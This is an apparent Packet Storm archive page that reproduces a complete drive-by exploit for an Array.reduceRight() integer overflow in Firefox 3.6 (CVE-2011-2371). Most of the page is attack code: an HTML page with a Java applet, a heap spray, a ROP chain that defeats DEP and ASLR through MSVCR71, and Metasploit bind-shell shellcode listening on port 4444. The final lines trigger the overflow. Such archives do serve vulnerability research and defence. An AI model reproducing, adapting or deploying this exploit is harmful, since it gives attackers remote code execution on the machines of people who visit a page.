what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Mozilla Firefox Integer Overflow

Mozilla Firefox Integer Overflow
Posted Oct 13, 2011
Authored by Matteo Memelli

Mozilla Firefox Integer Overflow | Mozilla Firefox Array.reduceRight() integer overflow exploit. James Besmertnuk has reported that this vulnerability is still present in Firefox version 9.0.1.

tags | exploit, overflow
advisories | CVE-2011-2371
SHA-256 | b0d79a9af8ab6b14c5febfcb8aae8db449fcd6cc78eecbb021905dadaa2e2e0e
Download | Favorite | View

Mozilla Firefox Integer Overflow

Change Mirror Download
# Title: Mozilla Firefox Array.reduceRight() Integer Overflow Exploit
# Date: 12 Oct 2011
# Author: Matteo Memelli  ryujin -AT- offensive-security.com
# CVE-2011-2371
# Full exploit package: http://www.exploit-db.com/sploits/17974.zip
 
<html>
<head>
<title>ff-i-<3-u</title>
</head>
<body>
<center>
<br />
Title: Mozilla Firefox Array.reduceRight() Integer Overflow Exploit<br />
Date: 12 Oct 2011<br />
Author: Matteo Memelli  ryujin -AT- offensive-security.com<br />
CVE-2011-2371<br />
Full exploit package: <br />
http://www.exploit-db.com/sploits/17974.zip <br />
<br />
Thx to dookie for helping ;)<br/>
Vulnerability discovered by Chris Rohlf and Yan Ivnitskiy of Matasano Security<br />
http://www.mozilla.org/security/announce/2011/mfsa2011-22.html<br/>
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2371<br/>
DEP / ASLR bypassing through JAVA MSVCR71 sayonara rop chain<br/>
Tested on Windows 7 Ultimate / firefox 3.6.16 and 3.6.17<br/><br/>
<APPLET id="MyApplet" code="ph33r.class" width=150 height=50>
You need a Java-enabled browser to pwn this.
</APPLET>
</center>
<script type="text/javascript">
var applet = document.getElementById('MyApplet');
 
function spray() {
        // fake object pointers
        var ptrs = unescape("%u4141" +       // padding
                            // MOV EDX,DWORD[ESI] 0c000048=0c00007c
                            "%u0048%u0c00" +
                            "%u4141%u4141" + // padding
                            "%u4141%u4141" + // padding
                            "%u4141%u4141" + // padding
                            "%u4141%u4141" + // padding
                            "%u4141%u4141" + // padding
                            "%u4141%u4141" + // padding
                            "%u4141%u4141" + // padding
                            "%u4141%u4141" + // padding
                            "%u4141"       + // padding
                            // PIVOT MSVCR71.dll 0x7C370EEF LEA ESP,[ESI-3]
                            //                              RETN 1C75
                            "%u0EEF%u7C37" +
                            "%u4141%u4141" + // padding
                            "%u4141"       + // padding
                            "%u240c%u3410" + // 3410240c RETN after PIVOT
                            "%u007c%u0c00" + // 0c00007c PTR TO END OF BUFFER
                            "%u4141%u4141" + // padding
                            "%u4141%u4141" + // padding
                            "%u4141%u4141" + // padding
                            "%u4141%u4141" + // padding
                            "%u4141%u4141" + // padding
                            "%u4141%u4141" + // padding
                            "%u4141%u4141" + // padding
                            "%u4141%u4141" + // padding
                            "%u4141%u4141" + // padding
                            "%u4141%u4141" + // padding
                            "%u4141%u4141" + // padding
                            "%u4141%u4141" + // padding
                            "%u002e%u0c00"); // 0c00007c -> 0c00002e
                                             // CALL PIVOT 0x7C370EEF
                                 
        var bheader    = 0x12/2; // u.n.d.e.f.i.n.e.d. string
                                 // beginning of each array element
        var nullt      = 0x2/2;  // string null terminator
         
        // 0:000> ? 0c001cbe   - 0c000012 
        // Evaluate expression: 7340 = 00001cac
        var espoffset  = (7340 /2) - ptrs.length;
        var esppadding = unescape("%u0c0c%u0c0c");
        while(esppadding.length < espoffset) {esppadding += esppadding;}
        esppadding = esppadding.substring(0, espoffset);
 
        // sayonara rop chain
        rop  = unescape("%u4cc1%u7c34"); // pop eax;ret;
        rop += unescape("%u10c2%u7c34"); // pop ecx;pop ecx;ret;
        rop += unescape("%u2462%u7c34"); // xor chain; call eax {0x7C3410C2}
        rop += unescape("%uc510%u7c38"); // writeable loc for lpflOldProtect
        rop += unescape("%u5645%u7c36"); // pop esi;ret;
        rop += unescape("%u5243%u7c34"); // ret;
        rop += unescape("%u8f46%u7c34"); // pop ebp;ret;
        rop += unescape("%u87ec%u7c34"); // call eax;
        rop += unescape("%u4cc1%u7c34"); // pop eax;ret;
        rop += unescape("%ufdff%uffff"); // {size}
        rop += unescape("%ud749%u7c34"); // neg eax;ret; {adjust size}
        rop += unescape("%u58aa%u7c34"); // add ebx, eax;ret; {size into ebx}
        rop += unescape("%u39fa%u7c34"); // pop edx;ret;
        rop += unescape("%uffc0%uffff"); // {flag}
        rop += unescape("%u1eb1%u7c35"); // neg edx;ret; {adjust flag}
        rop += unescape("%u4648%u7c35"); // pop edi;ret;
        rop += unescape("%u30ea%u7c35"); // mov eax,[eax];ret;
        rop += unescape("%u4cc1%u7c34"); // pop eax;ret;
        rop += unescape("%ua181%u7c37"); // (VP RVA + 30 - {0xEF adjustment}
        rop += unescape("%u5aeb%u7c35"); // sub eax,30;ret;
        rop += unescape("%u8c81%u7c37"); // pushad; add al,0xef; ret;
        rop += unescape("%u683f%u7c36"); // push esp;ret;
        rop += unescape("%ubc90%u0c0c%u0c0c"); // NOP / MOV ESP,0x0c0c0c0c
 
        // windows/shell_bind_tcp - 341 bytes
        // http://www.metasploit.com
        // VERBOSE=false, LPORT=4444, RHOST=, EXITFUNC=process,
        // InitialAutoRunScript=, AutoRunScript=
        var shell = unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" +
                             "%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" +
                             "%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" +
                             "%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" +
                             "%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" +
                             "%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" +
                             "%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" +
                             "%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" +
                             "%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" +
                             "%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" +
                             "%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" +
                             "%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" +
                             "%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" +
                             "%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" +
                             "%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" +
                             "%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" +
                             "%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" +
                             "%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" +
                             "%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" +
                             "%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" +
                             "%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" +
                             "%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" +
                             "%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" +
                             "%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" +
                             "%u006a%uff53%u41d5");
        rop += shell;
 
        var tr_padding = unescape("%u0c0c%u0c0c");
        while(tr_padding.length < 0x80000) {tr_padding += tr_padding;}
 
        var dummy = ptrs + esppadding + rop + tr_padding; 
        var hspray = dummy.substring(0,0x80000 - bheader - nullt);   
 
        // Allocation of 64 blocks of 1Mb.
        HeapBlocks = new Array()
        for (i=0;i<0x40;i++){
            HeapBlocks[i] += hspray;
        }
  }
 
spray();
hola = new Array;
hola.length = 2197815302;  // 0x0c000014 beginning of sprayed block
 
w00t = function ph33r(prev, myobj, indx, array) {
  alert(myobj[0]); // trigger getProperty
}
 
hola.reduceRight(w00t,1,2,3);
 
</script>
</body>
</html>


Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close